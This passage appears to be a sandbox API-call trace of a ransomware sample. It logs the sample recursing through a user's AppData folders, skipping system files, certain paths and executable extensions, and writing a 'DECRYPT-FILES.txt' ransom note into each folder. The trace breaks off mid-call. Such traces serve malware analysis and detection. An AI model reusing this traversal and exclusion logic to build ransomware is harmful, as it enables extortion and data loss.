[0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="boot.ini") returned 1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="desktop.ini") returned 1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat") returned -1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="iconcache.db") returned -1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="bootsect.bak") returned 1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat.log") returned -1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="thumbs.db") returned -1 [0080.446] lstrcmpiW (lpString1="Help.lnk", lpString2="Bootfont.bin") returned 1 [0080.446] lstrlenW (lpString="Help.lnk") returned 8 [0080.446] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.446] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.447] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.447] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.447] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.447] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.447] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.447] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 96 [0080.447] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.447] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0080.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\jkbimi8.tmp" [0080.447] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.447] CloseHandle (hObject=0x0) returned 0 [0080.447] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.448] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac23fbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.448] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0080.448] CloseHandle (hObject=0x460) returned 1 [0080.448] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0080.448] lstrcmpW (lpString1="Startup", lpString2=".") returned 1 [0080.448] lstrcmpW (lpString1="Startup", lpString2="..") returned 1 [0080.448] lstrcatW (in: lpString1="Startup", lpString2="\\" | out: lpString1="Startup\\") returned="Startup\\" [0080.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Startup\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Program Files") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch=":\\Windows") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Games\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\All Users") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.449] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="AhnLab") returned 0x0 [0080.449] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0080.449] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.449] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\jkbimi8.tmp") returned 104 [0080.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0080.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0080.449] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.449] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt") returned 110 [0080.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0080.450] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0080.451] CloseHandle (hObject=0x464) returned 1 [0080.451] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0080.451] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0080.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0080.451] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.451] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.451] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.451] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.451] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.451] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.452] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0080.452] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.452] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0080.452] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0080.452] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0080.452] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.452] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.452] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.452] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.452] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.452] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.452] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0080.452] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.452] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0080.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jkbimi8.tmp" [0080.452] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.453] CloseHandle (hObject=0x0) returned 0 [0080.453] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.453] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.453] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0080.453] CloseHandle (hObject=0x460) returned 1 [0080.453] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup\\", cAlternateFileName="")) returned 0 [0080.453] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0080.453] CloseHandle (hObject=0x458) returned 1 [0080.453] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs\\", cAlternateFileName="")) returned 0 [0080.454] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.454] CloseHandle (hObject=0x450) returned 1 [0080.454] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0080.454] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0080.454] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0080.454] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0080.454] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\All Users") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="AhnLab") returned 0x0 [0080.454] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0080.454] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.454] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\jkbimi8.tmp") returned 86 [0080.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\templates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.455] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0080.455] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.455] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt") returned 92 [0080.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.456] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.457] CloseHandle (hObject=0x454) returned 1 [0080.457] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0080.457] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="*" | out: 